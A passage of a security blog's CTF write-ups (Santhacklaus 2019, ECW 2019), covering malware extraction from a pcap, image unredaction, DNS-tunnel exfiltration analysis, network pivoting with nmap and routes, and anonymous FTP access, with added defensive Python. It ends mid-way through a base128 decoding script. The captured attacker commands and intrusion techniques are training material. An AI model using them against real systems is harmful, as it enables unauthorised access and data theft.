root@d58feef475e4:# chmod +x phar.bak
root@d58feef475e4:# ls -la
<span class="o">[</span>...<span class="o">]</span>
lrwxrwxrwx <span class="m">1</span> root root <span class="m">9</span> Oct <span class="m">25</span> <span class="m">02</span>:29 phar -> phar.phar
-rwxr-xr-x <span class="m">1</span> root www-data <span class="m">7634240</span> Nov <span class="m">20</span> <span class="m">22</span>:02 phar.bak
-rwxr-xr-x <span class="m">1</span> root root <span class="m">14817</span> Oct <span class="m">25</span> <span class="m">02</span>:29 phar.phar
<span class="o">[</span>...<span class="o">]</span>
root@d58feef475e4:# ./phar.bak <span class="p">&</span>
</code></pre></div>
<p>Through the <code>python</code> command, he manages to become the <code>root</code> user. This lets him escape <code>www-data</code> and gain privileges over the whole system.</p>
<p>We see the creation of a <code>flag</code> file but, as its content shows, there is nothing in it. Too bad :(. Right after that, he moves to the <code>/usr/bin</code> directory and lists its contents. This is where he fetches the malicious file: <code>phar.bak</code>. What it does is unknown, but he launches it in the background with the <code>&</code> operator.</p>
<p>So we need to extract that object from the Wireshark capture.</p>
<h2>Exporting the objects</h2>
<p>The <code>tshark</code> command lets us extract all the HTTP objects present in a capture. Since part of the traffic is over TLS, we have to give it the mapping: IP address, protocol, private key.</p>
<div class="highlight"><pre><span></span><code>$ tshark -r ../challenge.pcapng -o <span class="s2">"tls.keys_list: 172.17.0.5,443,http,1.key;172.17.0.1,443,http,1.key;172.17.0.1,443,http,2.key;172.17.0.5,443,http,2.key"</span> --export-objects <span class="s2">"http,export_http"</span> -Y <span class="s2">"http && tcp.stream eq 85672"</span>
<span class="m">184118</span> <span class="m">544</span>.690600279 <span class="m">172</span>.17.0.5 → <span class="m">172</span>.17.0.1 HTTP <span class="m">245</span> GET /DRUNK_IKEBANA HTTP/1.1 <span class="m">245</span>
<span class="m">185446</span> <span class="m">544</span>.740615854 <span class="m">172</span>.17.0.1 → <span class="m">172</span>.17.0.5 HTTP <span class="m">1324</span> HTTP/1.0 <span class="m">200</span> OK <span class="m">1324</span>
</code></pre></div>
<p>We then get all the HTTP objects in the <code>export_http</code> folder:</p>
<div class="highlight"><pre><span></span><code>$ ls export_http -al <span class="p">|</span> wc -l
<span class="m">4696</span>
$ ls -lh export_http/DRUNK_IKEBANA
-rw-r--r-- <span class="m">1</span> nlegall nlegall <span class="m">7634240</span> déc. <span class="m">26</span> <span class="m">13</span>:04 export_http/DRUNK_IKEBANA
$ file export_http/DRUNK_IKEBANA
export_http/DRUNK_IKEBANA: ELF <span class="m">64</span>-bit LSB executable, x86-64, version <span class="m">1</span> <span class="o">(</span>SYSV<span class="o">)</span>, statically linked, stripped
</code></pre></div>
<p>Perfect! The size of the extracted file matches the one downloaded by the attacker, so the extraction looks correct. Take its SHA256 and that's the flag:</p>
<div class="highlight"><pre><span></span><code>$ sha256sum export_http/DRUNK_IKEBANA <span class="p">|</span> sed -E <span class="s1">'s/^(.)/SANTA{\1/'</span> <span class="p">|</span> sed -E <span class="s1">'s/ (.*)/}/'</span>
SANTA<span class="o">{</span>daeb4a85965e61870a90d40737c4f97d42ec89c1ece1c9b77e44e6749a88d830<span class="o">}</span>
</code></pre></div>
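<p>As an added check of my own (not part of the original write-up), the following Python verifies that an exported HTTP object is complete before hashing it: the body length is compared with the <code>Content-Length</code> header and with an independent figure such as the size <code>wget</code> printed in the captured shell session (7634240 bytes here). The PS below explains why this matters: a wrong protocol in the key list silently yields a truncated export, and hashing a truncated file gives a wrong flag with no error. The HTTP response bytes are constructed for the example and stand in for the real binary; the function names are mine.</p>

```python
import hashlib

# Constructed sample: a minimal HTTP/1.0 response as tshark sees it after TLS
# decryption. The 32-byte body stands in for the exported binary; it is not
# the real DRUNK_IKEBANA file.
FULL_RESPONSE = (
    b"HTTP/1.0 200 OK\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Length: 32\r\n"
    b"\r\n"
    + b"\x7fELF" + b"\x00" * 28
)

# Constructed: the same response with the body cut short, the symptom of a
# wrong protocol in tls.keys_list (only the beginning of the object is decoded).
TRUNCATED_RESPONSE = FULL_RESPONSE[:-10]


def split_response(raw):
    """Split a raw HTTP response into (status line, lower-cased header dict, body bytes)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers found")
    lines = head.split(b"\r\n")
    status = lines[0].decode("ascii", "replace")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("ascii", "replace")] = \
            value.strip().decode("ascii", "replace")
    return status, headers, body


def check_export(raw, expected_length=None):
    """Return (complete, declared_length, actual_length) for the response body.

    expected_length is an independent figure, e.g. the size wget printed in the
    captured shell session (7634240 in the write-up). HTTP/1.0 servers may omit
    Content-Length and rely on connection close, so that cross-check matters.
    """
    _, headers, body = split_response(raw)
    declared = int(headers["content-length"]) if "content-length" in headers else None
    actual = len(body)
    complete = declared is None or declared == actual
    if expected_length is not None:
        complete = complete and actual == expected_length
    return complete, declared, actual


def flag_from_bytes(data, prefix="SANTA"):
    """sha256 hex digest wrapped in the flag format, like the sha256sum | sed pipeline above."""
    return "%s{%s}" % (prefix, hashlib.sha256(data).hexdigest())


def flag_for_export(raw, expected_length=None):
    """Hash the body only when the export is complete; otherwise explain what is wrong."""
    complete, declared, actual = check_export(raw, expected_length)
    if not complete:
        return None, "export incomplete: Content-Length %s, body %d bytes" % (declared, actual)
    _, _, body = split_response(raw)
    return flag_from_bytes(body), "ok"


if __name__ == "__main__":
    print(flag_for_export(FULL_RESPONSE, expected_length=32))
    print(flag_for_export(TRUNCATED_RESPONSE))
```

<p>On a real export, feed the file tshark wrote to <code>flag_from_bytes</code> only after <code>check_export</code> agrees with the size seen in the attacker's own download; the two numbers come from independent places in the capture, so a mismatch points at the decryption setup rather than at the file.</p>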
<p>Thanks to Maki for creating this challenge. It was very interesting and instructive :).</p>
<h3>PS</h3>
<p>Be sure to put <code>HTTP</code> as the protocol in the TLS key list, not <code>TLS</code>. I made that mistake and it cost me 3 hours. I did have the frames decoded and could display the exchanges (like the three frames shown above).</p>
<p>However, it was impossible to get the binary extracted in full. Only the first two KB of the file were extracted. A mistake not to make again :p.</p>
<h1>Santhacklaus 2019 - Call me if you can (1)</h1>
<p><em>2019-12-24 - nlegall</em></p>
<div class="highlight"><pre><span></span><code>You have been contracted to get information on a target.
You need to find his number first
Everything you need is in the investigation folder. You don't need to go online.
Flags is SANTA{+33XXXXXXXXX}. Just replace the X's with the numbers you'll find. Once you find the number, don't call it, you will unlock another challenger with further instructions.
Investigation File is here . MD5 is bd9d36c7f1fa8eca9bc096e9525a5a1c.
</code></pre></div>
<p>We are given an archive containing a set of files. Extracting it gives us the following files:</p>
<div class="highlight"><pre><span></span><code>├── Dropsbox
│ ├── 3c9f1550bfa66f48d82d166f978bc2f8.pdf
│ ├── 5ae51f9bf48ddc082fdb83f3f1bf612c.pdf
│ ├── 79bc419ba71c464f77986eb60a3e9fdd.pdf
│ ├── 7a551750a648d3059d2385d5058cea7e.pdf
│ ├── 8a4e1425767cfce6d967f6399ffbceba.pdf
│ ├── 9e444b0fc8b937cfc58fcd1a6280d04d.pdf
│ ├── 9fd9d47270bbc75f765835a435f0e5fb.pdf
│ ├── b18bc307d0a5911a15eadfb83d8b0504.pdf
│ ├── ce8b5773ede1293b7eefffea757f737f.png
│ ├── dd0d83c7c7b310693fb4a16fc9035fb7.pdf
│ ├── ea062527cb24d8663b6819d2893b121a.pdf
│ ├── f762754554211647b663b152ab080530.pdf
│ ├── f82645294cae45d53c980ea24440f6c3.ods
│ └── fe18010c71ea1fb5a62bd703e976afb8.pdf
├── Keylog <span class="p">&</span> recordings
│ ├── 29488780488a0b6a06f7fd491fe5c021.m4a
│ └── a57227ea3f4eb6de8120cf30ac26846c.log
└── Social Networks
├── Fakebook
│ ├── 0a92f64b25e17202d295e1920fbe88fd.jpeg
│ ├── 1197587d9d8d5428ba7b525a508956b1.jpg
│ ├── 12e92b9e8254f7ff73345d12ff7268ce.jpg
│ ├── 32dbd552b8a967fdb25910184c37e4d4.jpg
│ ├── 84057b704fc6a4508b4b3446b8388d94.mp4
│ ├── c1c59af2a8e1c0e4f9555533247329c3.jpg
│ ├── ddeca591b56beffc614ce06224bf0719.jpg
│ ├── dfc5a9210294315fc1da2b757eee6d01.jpg
│ └── ed3294264398b6198a0e47f5054277e4.mp4
├── Linksin
│ └── cfbdeeeba7cfc77865d45ece99eea764.png
└── Minigram
├── 015ac39aa27e6120084ef181347c5555.jpg
├── 0524717ac2e5b851e4b0a2090b0321f8.jpg
├── 09a358531af60558f35e4b3a430f68bf.jpg
├── 379df76c0534ea4671224645234bc98d.jpg
├── 5688d7aa42462ea07cf682f559d5e51b.jpg
├── 637e886323fa832f014f6d2f69543628.jpg
├── 8d4cd3519b6cb3013052f34a5604c6b9.jpg
├── ade67625ccdd3549d61fea5d30a239ed.jpg
├── bad8de4e45a76be9e764adf58c7d7572.jpg
└── f6016d5a8d4a94761268f5f27056c64e.jpg
<span class="m">6</span> directories, <span class="m">36</span> files
</code></pre></div>
<p>We know we have to find a phone number. Browsing through the images, we come across this one:</p>
<p><img alt="callme1" src="https://blog.nlegall.fr/images/santhacklaus/callme1.jpg"></p>
<p>Hmm. Text blacked out, and it talks about a <code>number</code>... So we can try to recover what is hidden. We open the image in Gimp, invert the colours (negative) and adjust contrast and saturation to get this:</p>
<p><img alt="callme2" src="https://blog.nlegall.fr/images/santhacklaus/callme2.jpg"></p>
<p>We then see the first phone number: <code>+33634863367</code>. However, a correction has been made to it: <code>+33634683367</code>.</p>
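<p>Why the negative-plus-contrast trick works is worth seeing in numbers. The following Python is my own added example, not the write-up's: it applies the same two steps (invert, then a linear contrast stretch) to a tiny constructed grayscale "image" in which a glyph was "redacted" by painting near-black (value 4) over it, which is invisible to the eye but not equal to the background (0). The second constructed image is the properly redacted case, every pixel overwritten with one value, and the same processing recovers nothing from it. The array values and function names are mine.</p>

```python
# Constructed 6x10 "grayscale image": a blacked-out box where the redaction was
# drawn in near-black over text. Background 0, residual glyph pixels 4.
REDACTED_NEAR_BLACK = [
    [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
    [0, 4, 4, 4, 0, 0, 4, 0, 0, 0],
    [0, 0, 4, 0, 0, 0, 4, 0, 0, 0],
    [0, 0, 4, 0, 0, 0, 4, 0, 0, 0],
    [0, 0, 4, 0, 0, 4, 4, 4, 0, 0],
    [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
]

# Constructed: the same box redacted properly (every pixel overwritten with the
# same value), so there is no residual signal left to amplify.
REDACTED_FLAT = [[0] * 10 for _ in range(6)]


def invert(img):
    """Negative: v -> 255 - v."""
    return [[255 - v for v in row] for row in img]


def stretch_contrast(img):
    """Linear contrast stretch: map the image's [min, max] onto [0, 255].
    A flat image is returned unchanged (nothing to amplify)."""
    flat = [v for row in img for v in row]
    lo, hi = min(flat), max(flat)
    if hi == lo:
        return [row[:] for row in img]
    return [[(v - lo) * 255 // (hi - lo) for v in row] for row in img]


def reveal(img):
    """Negative followed by contrast stretch, the Gimp sequence used above."""
    return stretch_contrast(invert(img))


def residual_range(img):
    """Spread of pixel values inside a redaction box; 0 means nothing is recoverable.
    This is the check to run on your own redactions before publishing."""
    flat = [v for row in img for v in row]
    return max(flat) - min(flat)


def render(img, threshold=128):
    """ASCII view: '#' for pixels that stand out (dark) after processing."""
    return "\n".join("".join("#" if v < threshold else "." for v in row) for row in img)


if __name__ == "__main__":
    print(render(reveal(REDACTED_NEAR_BLACK)))
    print("residual range, near-black redaction:", residual_range(REDACTED_NEAR_BLACK))
    print("residual range, flat redaction:", residual_range(REDACTED_FLAT))
```

<p>The defender-side lesson is the <code>residual_range</code> function: a redaction is only safe when the covered region is truly uniform (or better, the pixels are removed before the image is re-encoded), because any residual spread, even a few levels, is fully recoverable by a stretch.</p>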
<p>The flag is therefore: <code>SANTA{+33634683367}</code>. That unlocks the second part and earns 150 points.</p>
<h1>Santhacklaus 2019 - Grepepe</h1>
<p><em>2019-12-24 - nlegall</em></p>
<div class="highlight"><pre><span></span><code>Do you know grep ? Regex ? Well you should. It's very useful, especially during CTFs. Remember the flag is something like SANTA{fl4g_f0rmAT}.
MD5 : 6c4299aaa7c7da7250f647e3665fb7a6
</code></pre></div>
<p>The statement gives away the technique to use: <code>grep</code>. I used <code>rg</code> (ripgrep), which does essentially the same thing as grep. We run it searching for <code>SANTA{</code>:</p>
<div class="highlight"><pre><span></span><code>$ rg <span class="s1">'SANTA\{'</span> flag.txt
<span class="m">57</span>:~qSSANSSSSSANTASSSSASS2SANT@SANTSI7SANtS^SA<SSANzSSANMMSANySSM<span class="nv">$SANTASASXSS</span><span class="s1">'_?SANSAN:FSSSANSA{}SSSSSANTSYbSASASASA8US?'</span>eNSSAySrSSATSA<span class="s2">"SASVSANTSANSWSTSAeS.SFSAN,SA8SSAGJS5SASuA4S_SSSSANTXSSSSANTA{grep_is_pretty_US3f(..)l}<SSjSANSSSATSASSASASSJSSAitSA1cSSSANTSSANTSSSSANKASASAS{}t!SSANTSA)S!SA SANSSSAN9jrZ?rSANSSSSSSSSSAS^SSASANTASANSASqSANSASSSANSSJYS1SuSAS```</span>
</code></pre></div>
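<p>The noisy line above is built to defeat a lazy <code>grep SANTA</code>: the prefix appears several times and there are decoys like <code>SANSA{}</code> and <code>SAS{}</code>. As an added example of my own (not from the write-up), the Python below searches that same line with a pattern that matches the whole flag rather than the prefix, and shows why the braces must be escaped (an unescaped <code>{</code> starts a repetition quantifier in most regex engines). The line is embedded as sample input and the function names are mine.</p>

```python
import re

# Sample input: the rg output line from the write-up (without its "57:" line number).
NOISY_LINE = r"""~qSSANSSSSSANTASSSSASS2SANT@SANTSI7SANtS^SA<SSANzSSANMMSANySSM$SANTASASXSS'_?SANSAN:FSSSANSA{}SSSSSANTSYbSASASASA8US?'eNSSAySrSSATSA"SASVSANTSANSWSTSAeS.SFSAN,SA8SSAGJS5SASuA4S_SSSSANTXSSSSANTA{grep_is_pretty_US3f(..)l}<SSjSANSSSATSASSASASSJSSAitSA1cSSSANTSSANTSSSSANKASASAS{}t!SSANTSA)S!SA SANSSSAN9jrZ?rSANSSSSSSSSSAS^SSASANTASANSASqSANSASSSANSSJYS1SuSAS"""


def flag_pattern(prefix="SANTA"):
    """Compile PREFIX{...}: re.escape protects the prefix, the braces are escaped
    explicitly, and the body must be at least one character with no brace or space,
    so an empty SANTA{} or an unclosed SANTA{ does not match."""
    return re.compile(re.escape(prefix) + r"\{[^{}\s]+\}")


def find_flags(text, prefix="SANTA"):
    """All complete flags in the text, in order of appearance."""
    return flag_pattern(prefix).findall(text)


def count_prefix_hits(text, prefix="SANTA"):
    """How many times the bare prefix occurs: the number of false leads
    a plain 'grep SANTA' would hand you on this line."""
    return len(re.findall(re.escape(prefix), text))


if __name__ == "__main__":
    print(count_prefix_hits(NOISY_LINE), "occurrences of the bare prefix")
    print(find_flags(NOISY_LINE))
```

<p>With <code>rg</code> the equivalent is to pass the full pattern rather than the prefix, e.g. <code>rg -o 'SANTA\{[^{}\s]+\}' flag.txt</code>, so only the complete flag is printed instead of the whole 10 KB line.</p>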
<p>And the flag comes to us :). 50 more points.</p>
<h1>Santhacklaus 2019 - Ho Ho Ho</h1>
<p><em>2019-12-24 - nlegall</em></p>
<div class="highlight"><pre><span></span><code>Ho ho ho ! Welcome to the Santhacklaus CTF v2. We hope you'll like this edition :) In the mean time, why don't you flag this welcome challenge ?
The flag has two parts. First part is on our Twitter channel. Second part is in our Discord server. Expect something in l33tspeak. Flag is SANTA{sha256(concat(part1, part2))}
Exemple with part1=hello_ and part2=friend, flag would be SANTA{sha256(hello_friend)} = SANTA{db51...c331}
</code></pre></div>
<p>So we have to find the two parts of the flag on the team's Discord server and Twitter account.</p>
<p>The easiest is the Twitter account. Scrolling down the tweet feed, we find this tweet: https://twitter.com/santhacklaus/status/1192024086073008128</p>
<p><img alt="hohoho1" src="https://blog.nlegall.fr/images/santhacklaus/hohoho1.png"></p>
<p>So we now hold the first part of the flag :D. Off to find its other half :).</p>
<p>Looking at the window, I first find a username in l33t.</p>
<p><img alt="hohoho1" src="https://blog.nlegall.fr/images/santhacklaus/hohoho2.png"></p>
<p>I figure it must be part of the flag, and it even makes a meaningful phrase: <code>M3rryChR1stm4SCh3n4p4N</code>.</p>
<p>But no luck :(. We resume the search, not without difficulty. Desperate after finding nothing at all, we go back channel by channel and look at the whole Discord window. And we find the flag in the header. You know, the place almost nobody looks at...</p>
<p>We concatenate our two parts and take the sha256:</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">printf</span> <span class="s2">"M3rryChR1stm4SYouF1LTHY4nimaL5"</span> <span class="p">|</span> sha256sum <span class="p">|</span> sed -E <span class="s1">'s/^(.)/SANTA{\1/'</span> <span class="p">|</span> sed -E <span class="s1">'s/ -/}/'</span>
SANTA<span class="o">{</span>47892182dc20d2eb48f8e53c665ec0e9c75c8b7fc8e466fc56fa2fcb700da999<span class="o">}</span>
</code></pre></div>
<p>And that's the flag :). The first 25 points :D.</p>
<h1>Santhacklaus 2019 - The Beginning</h1>
<p><em>2019-12-24 - nlegall</em></p>
<div class="highlight"><pre><span></span><code>A trip down memory lane...
Santhacklaus CTF was born in 2018. Raised by four proud dads, it became something more and has grown in many ways.
We need you to find the flag of the "Bonjour" challenge of the first edition. It is not in a SANTA{} format but in IMTLD{}.
</code></pre></div>
<p>A simple internet search turns up last year's write-ups, and with them the flag for this challenge:</p>
<div class="highlight"><pre><span></span><code>IMTLD{BaguetteForXMAS}
</code></pre></div>
<p>Hop! 25 more points :D.</p>
<h1>ECW - At your service</h1>
<p><em>2019-11-22 - nlegall</em></p>
<div class="highlight"><pre><span></span><code>At your service (150 points + ???)
<span class="n">Our</span> <span class="n">internal</span> <span class="n">IT</span> <span class="n">team</span> <span class="k">has</span> <span class="n">developed</span> <span class="n">an</span> <span class="n">innovative</span> <span class="n">tool</span> <span class="nb">to</span> <span class="n">assist</span> <span class="n">users</span> <span class="nb">in</span> <span class="n">their</span> <span class="n">daily</span> <span class="n">tasks</span>.
<span class="n">This</span> <span class="n">tool</span> <span class="k">has</span> <span class="n">been</span> <span class="n">deployed</span> <span class="n">on</span> <span class="n">some</span> <span class="n">Windows</span> <span class="n">workstations</span> <span class="nb">last</span> <span class="n">months</span>, <span class="k">but</span> <span class="n">we</span> <span class="n">strongly</span> <span class="n">suspect</span> <span class="n">that</span> <span class="n">attackers</span> <span class="n">have</span> <span class="n">used</span> <span class="n">it</span> <span class="nb">to</span> <span class="n">gain</span> <span class="n">administrator</span> <span class="n">privileges</span> <span class="n">on</span> <span class="n">these</span> <span class="n">machines</span>.
<span class="n">The</span> <span class="n">service</span> <span class="k">is</span> <span class="n">installed</span> <span class="n">on</span> <span class="n">a</span> <span class="n">Windows</span> <span class="n">workstation</span> <span class="n">on</span> <span class="n">the</span> <span class="n">Administrative</span> <span class="n">Center</span> <span class="n">LAN</span> <span class="k">with</span> <span class="n">the</span> <span class="n">IP</span> <span class="n">address</span> <span class="mf">10.0.40.10</span>. <span class="n">You</span> <span class="nb">can</span> <span class="nb">connect</span> <span class="k">with</span> <span class="n">RDP</span> <span class="nb">to</span> <span class="n">this</span> <span class="n">machine</span> <span class="n">using</span> <span class="n">the</span> <span class="n">following</span> <span class="n">credentials:</span> <span class="n">user</span> / <span class="n">user</span>.
</code></pre></div>
<p>We connect to the server over RDP with the supplied credentials. The description says that what we are looking for is a service, so we can open the services console:</p>
<div class="highlight"><pre><span></span><code><span class="err">services.msc</span>
</code></pre></div>
<p>We then see a service called Alfred (thanks Batman :p) with a nice description:</p>
<p><img alt="alfred.png" src="https://blog.nlegall.fr/images/ecw/alfred.png"></p>
<p>So we have the first flag of the challenge and its 25 points :).</p>
<h1>ECW - Data exfiltration</h1>
<p><em>2019-11-22 - nlegall</em></p>
<p><em>File : <a href="https://blog.nlegall.fr/files/ecw/extracted.pcap">extracted.pcap</a></em></p>
<p><em>Thanks to Killbit for finding the writeup and the two python scripts!</em></p>
<div class="highlight"><pre><span></span><code><span class="k">Data</span> <span class="n">exfiltration</span> <span class="p">(</span><span class="mi">50</span> <span class="n">points</span><span class="p">)</span>
<span class="n">It</span> <span class="n">seems</span> <span class="n">that</span> <span class="k">some</span> <span class="k">sensitive</span> <span class="n">information</span> <span class="n">has</span> <span class="n">been</span> <span class="n">compromised</span><span class="p">.</span> <span class="n">The</span> <span class="n">supervision</span> <span class="n">teams</span> <span class="n">have</span> <span class="n">captured</span> <span class="n">suspicious</span> <span class="n">traffic</span> <span class="k">and</span> <span class="n">stored</span> <span class="n">it</span> <span class="k">in</span> <span class="n">the</span> <span class="n">FTP</span> <span class="n">server</span> <span class="k">of</span> <span class="n">the</span> <span class="n">Harbour</span><span class="err">'</span><span class="n">s</span> <span class="n">Master</span> <span class="n">Office</span> <span class="n">Secure</span> <span class="p">(</span><span class="n">HMOS</span><span class="p">)</span> <span class="n">LAN</span><span class="p">,</span> <span class="n">but</span> <span class="k">do</span> <span class="k">not</span> <span class="n">succeed</span> <span class="k">to</span> <span class="k">analyze</span> <span class="n">it</span><span class="p">.</span>
<span class="n">Help</span> <span class="n">them</span><span class="p">.</span>
</code></pre></div>
<p>First step: retrieving the files. Off to the FTP server! We first have to find its IP. We know it sits in the <code>HMOS (Harbour's Master Office Secure) LAN</code> but have no other information about it. We can, however, make targeted guesses. Two networks are announced, <code>10.0.10.0/24</code> and <code>10.0.30.0/24</code>, so let's try the one in between: <code>10.0.20.0/24</code>.</p>
<p>An NMAP scan returns nothing, because that network does not seem to be reachable.</p>
<p>A network scan of the LAN shows a server at <code>10.0.10.254</code>.</p>
<div class="highlight"><pre><span></span><code><span class="err">Nmap scan report for 10.0.10.254</span>
<span class="err">Host is up (0.00067s latency).</span>
<span class="err">Not shown: 99 closed ports</span>
<span class="err">PORT STATE SERVICE</span>
<span class="err">22/tcp open ssh</span>
<span class="err">MAC Address: 2E:0A:45:6B:CB:7F (Unknown)</span>
</code></pre></div>
<p>So we add a route to that network through this server: <code>ip r a 10.0.20.0/24 via 10.0.10.254 dev eth0</code>.</p>
<p>We can then redo our network scan:</p>
<div class="highlight"><pre><span></span><code><span class="n">Starting</span> <span class="n">Nmap</span> <span class="mi">7</span><span class="p">.</span><span class="mi">80</span> <span class="p">(</span> <span class="n">https</span><span class="p">:</span><span class="o">//</span><span class="n">nmap</span><span class="p">.</span><span class="n">org</span> <span class="p">)</span> <span class="k">at</span> <span class="mi">2019</span><span class="o">-</span><span class="mi">11</span><span class="o">-</span><span class="mi">21</span> <span class="mi">10</span><span class="p">:</span><span class="mi">15</span> <span class="n">EST</span>
<span class="n">Nmap</span> <span class="n">scan</span> <span class="n">report</span> <span class="k">for</span> <span class="mi">10</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">20</span><span class="p">.</span><span class="mi">1</span>
<span class="k">Host</span> <span class="k">is</span> <span class="n">up</span> <span class="p">(</span><span class="mi">0</span><span class="p">.</span><span class="mi">00068</span><span class="n">s</span> <span class="n">latency</span><span class="p">).</span>
<span class="k">Not</span> <span class="n">shown</span><span class="p">:</span> <span class="mi">99</span> <span class="n">closed</span> <span class="n">ports</span>
<span class="n">PORT</span> <span class="k">STATE</span> <span class="n">SERVICE</span>
<span class="mi">22</span><span class="o">/</span><span class="n">tcp</span> <span class="k">open</span> <span class="n">ssh</span>
<span class="n">Nmap</span> <span class="n">scan</span> <span class="n">report</span> <span class="k">for</span> <span class="mi">10</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">20</span><span class="p">.</span><span class="mi">10</span>
<span class="k">Host</span> <span class="k">is</span> <span class="n">up</span> <span class="p">(</span><span class="mi">0</span><span class="p">.</span><span class="mi">0012</span><span class="n">s</span> <span class="n">latency</span><span class="p">).</span>
<span class="k">Not</span> <span class="n">shown</span><span class="p">:</span> <span class="mi">98</span> <span class="n">filtered</span> <span class="n">ports</span>
<span class="n">PORT</span> <span class="k">STATE</span> <span class="n">SERVICE</span>
<span class="mi">21</span><span class="o">/</span><span class="n">tcp</span> <span class="k">open</span> <span class="n">ftp</span>
<span class="mi">22</span><span class="o">/</span><span class="n">tcp</span> <span class="k">open</span> <span class="n">ssh</span>
<span class="n">Nmap</span> <span class="n">done</span><span class="p">:</span> <span class="mi">256</span> <span class="n">IP</span> <span class="n">addresses</span> <span class="p">(</span><span class="mi">2</span> <span class="n">hosts</span> <span class="n">up</span><span class="p">)</span> <span class="n">scanned</span> <span class="k">in</span> <span class="mi">13</span><span class="p">.</span><span class="mi">97</span> <span class="n">seconds</span>
</code></pre></div>
<p>Bingo! We have our FTP server. We open a connection with FileZilla. Since we have no information about the username and password, we try with nothing at all...</p>
<p><img alt="ftp.png" src="https://blog.nlegall.fr/images/ecw/ftp.png"></p>
<p>And, surprising as it is, it works. Thanks, FTP... We then pull down the whole contents.</p>
<p>We then have these files at our disposal:</p>
<div class="highlight"><pre><span></span><code>├── Challenges
│ ├── Android
│ │ ├── base.apk
│ │ └── dump.pcap
│ └── Data exfiltration
│ ├── capture.pcap
├── Confidential patents
│ ├── <span class="m">2162819600219719</span>.jpg
│ ├── <span class="m">3479819471660548</span>.jpg
│ ├── <span class="m">3725111495999545</span>.jpg
│ ├── <span class="m">5240616991475271</span>.jpg
│ ├── <span class="m">5459753873408937</span>.jpg
│ ├── <span class="m">7729689642204675</span>.jpg
│ └── <span class="m">8905726261278207</span>.jpg
├── flag.txt
├── ftp.png
└── ship.txt
</code></pre></div>
<p>There is a flag.txt that gets us a few points:</p>
<div class="highlight"><pre><span></span><code>cat flag.txt
ECW<span class="o">{</span>acb2<span class="o">[</span>...<span class="o">]</span>3c56<span class="o">}</span>
</code></pre></div>
<p>And our <code>capture.pcap</code> file, which is the one of interest. We open it with Wireshark. Browsing through it, we see a number of strange DNS queries:</p>
<p><img alt="dataexfiltration_2.png" src="https://blog.nlegall.fr/images/ecw/dataexfiltration_2.png"></p>
<p>After a quick search on the content of the queries, we find the tool used for this exfiltration: <a href="https://code.kryo.se/iodine/">iodine</a>.</p>
<p>The goal is therefore to filter the queries to the malicious domain (<code>.to.badland.com</code>) and decode the exchange.</p>
<p>Searching the internet, we come across a Rawsec write-up of a past challenge on this technology: https://rawsec.ml/en/hxp-2017-write-ups.</p>
<p><em>They are not (yet) Python 3 compatible. Remember to use <code>python2</code> if you get errors.</em></p>
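<p>Before decoding anything, a defender first has to notice the tunnel in the DNS logs. The following Python 3 is my own added example; it is neither one of the Rawsec scripts (those follow below) nor iodine's code. It scores DNS query names per zone with the properties that made the queries above look strange: many distinct subdomains under one zone, long labels, and label contents with high entropy. The query names are constructed to resemble encoded payloads under the <code>.to.badland.com</code> domain from the capture, not real captured data; the thresholds and the fixed two-label split in <code>registered_domain</code> are simplifying assumptions of mine (a real detector would use a public-suffix list).</p>

```python
import math
from collections import defaultdict

# Constructed sample DNS query names (qname only). The .to.badland.com suffix is
# the malicious domain from the write-up; the label contents are made up to look
# like encoded tunnel payloads and are not real captured data.
SAMPLE_QUERIES = [
    "www.example.com",
    "mail.example.com",
    "zaycmadbpgk0ex7jqnv.to.badland.com",
    "0pqzt1ldl1c5mkr73b9o4ea5pl.to.badland.com",
    "3w5tz0acxhsr8r1wvzkyt6rq2b.to.badland.com",
    "cdn.example.com",
    "jcvqa4cm9yb3p7wzfnl0gq0rt2.to.badland.com",
    "n1aoh0s8v3yedq7dx6a4kb.to.badland.com",
    "www.example.com",
]


def shannon_entropy(s):
    """Bits per character; encoded payloads score high, words like 'www' score low."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname, levels=2):
    """Crude zone split on a fixed label count (assumption: no public-suffix list)."""
    return ".".join(qname.lower().rstrip(".").split(".")[-levels:])


def subdomain_part(qname, levels=2):
    """Everything left of the zone, i.e. the part a tunnel uses to carry data."""
    return ".".join(qname.lower().rstrip(".").split(".")[:-levels])


def score_domains(qnames, levels=2, min_queries=3, unique_ratio=0.8, min_entropy=3.5):
    """Return {zone: stats} for zones whose subdomains look like tunnel payloads:
    mostly unique, long, high-entropy labels. Thresholds are illustrative."""
    per_zone = defaultdict(list)
    for q in qnames:
        per_zone[registered_domain(q, levels)].append(subdomain_part(q, levels))
    flagged = {}
    for zone, subs in per_zone.items():
        if len(subs) < min_queries:
            continue
        uniq = set(subs)
        ratio = len(uniq) / len(subs)
        avg_len = sum(len(s) for s in uniq) / len(uniq)
        avg_ent = sum(shannon_entropy(s.replace(".", "")) for s in uniq) / len(uniq)
        if ratio >= unique_ratio and avg_ent >= min_entropy:
            flagged[zone] = {
                "queries": len(subs),
                "unique_ratio": round(ratio, 2),
                "avg_label_len": round(avg_len, 1),
                "avg_entropy": round(avg_ent, 2),
            }
    return flagged


if __name__ == "__main__":
    for zone, stats in score_domains(SAMPLE_QUERIES).items():
        print(zone, stats)
```

<p>Run over a real resolver log, the zone that scores here is exactly what the write-up then filters on (<code>.to.badland.com</code>), which is where the decoding work starts.</p>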
<div class="highlight"><pre><span></span><code>"""
Horrible looking direct port of
https://github.com/yarrick/iodine/blob/master/src/base128.c
"""
# Python 2 code (the companion extraction script uses string.translate / print i).
cb128 = \
    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" \
    "\274\275\276\277" \
    "\300\301\302\303\304\305\306\307\310\311\312\313\314\315\316\317" \
    "\320\321\322\323\324\325\326\327\330\331\332\333\334\335\336\337" \
    "\340\341\342\343\344\345\346\347\350\351\352\353\354\355\356\357" \
    "\360\361\362\363\364\365\366\367\370\371\372\373\374\375"
